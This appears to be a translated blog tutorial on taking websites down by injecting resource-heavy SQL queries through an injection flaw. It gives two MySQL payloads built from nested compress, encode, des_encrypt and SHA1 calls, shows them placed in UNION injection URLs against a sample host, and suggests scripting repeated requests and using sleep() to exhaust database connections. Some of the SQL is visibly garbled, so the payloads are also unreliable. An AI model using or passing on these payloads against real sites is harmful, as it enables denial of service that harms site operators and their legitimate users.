Methods of implementing DDoS attacks through SQL injection

Before that, let me introduce the ideas and principles of this approach so that you can better understand this attack method. We know that if a Web site has a SQL injection vulnerability, then we can have the site database execute our SQL statements and get the corresponding output (of course, there are no echoes in some cases). So we have a way of thinking: construct a SQL statement that is complex enough to run the database, consume the resources of the Web service and database, run out of server resources, and we can even get the database up to its maximum number of connections, so that the database can no longer respond to other legitimate users ' connection requests.

At the moment, the whole idea is clear and we can begin to construct complex SQL statements.

SQL provides us with a number of functions that allow us to construct complex enough statements to use an extremely complex method to get the corresponding output, such as join (), like (), compress (), encode () function, etc.

We will take the following steps to complete our attack:

1. Locate a site that has an injection vulnerability.

2. Construct our SQL injection statement

3. Implementing a SQL DDoS attack on the target site

How to find SQL injection vulnerabilities and construct SQL statements, my previous article has been described in detail, you can read it. I assume that you already have the knowledge and then continue our discussion.

Inject our DDoS query statement into the website

There are many ways to do this, what you need is your brain, and a website for testing. Next, let's construct the fatal SQL statement.

I created a 500-row table with 500 bytes of data in each field, which actually represents the amount of data in some forums, blog sites. If the database is larger, we can find more flaws in database operations, and it is easier to successfully implement DDoS attacks on such sites.

We will use the following payload to implement a DDoS attack, and I have spent several hours constructing these payload:

Select Tab1 from (select decode (encode (convertcompress (POST) using latin1),concat ( Post,post,post,post)),SHA1 (concat (Post,post,post,post))) as tab1 from table_1) A;

Select Tab1 from (select decode (encode (convertcompress (POST) using latin1),Des_ Encrypt (concat (post,post,post,post),8)),Des_encrypt (SHA1 (concat)), 9) as tab1 from table_1) A;

Let's say this is the site where we found a SQL injection vulnerability, and the injection statement is as follows:

http://exploitable-web.com/link.php?id=1 ' Union select 1,2,3,4--

We assume that the 3rd field can be used to echo, and we put our second payload in the third field.

Http://exploitable-web.com/link.php?id=1 ' unionSelect 1,2, (select Tab1 from (select decode (encode (convertcompress (POST) using latin1),des_encrypt (concat (post,post,post,post),8)),Des_encrypt (SHA1 ( Concat (Post,post,post,post)),9) as Tab1 from table_1) a),4--

Or

Http://exploitable-web.com/link.php?id=1 ' Union select 1, 2,tab1,4 from ( select decode (encode (convert (compress (POST) using latin1), des_encrypt (concat (Post,post,post,post), 8)), des_encrypt (SHA1 (concat (post,post,post,post)), 9)) as Tab1 from table_1) a-- 

Next, we can write a script that will constantly send this query to the Web site database, using this method, we can only through a normal connection to the site will be paralyzed. When using this approach for DDoS attacks, we don't need thousands of chickens.

We can also use the Sleep statement to maintain our connection to the site, as well as to achieve the same effect as a DDoS attack. In ASP. NET, the default is to allow up to 100 connections in 30 seconds, and we can use sleep () to persist our connection to the site (multiple connections can be made using the script) so that the server does not respond properly to requests from other users.

Okay, here's the end of the article.

Methods of implementing DDoS attacks through SQL injection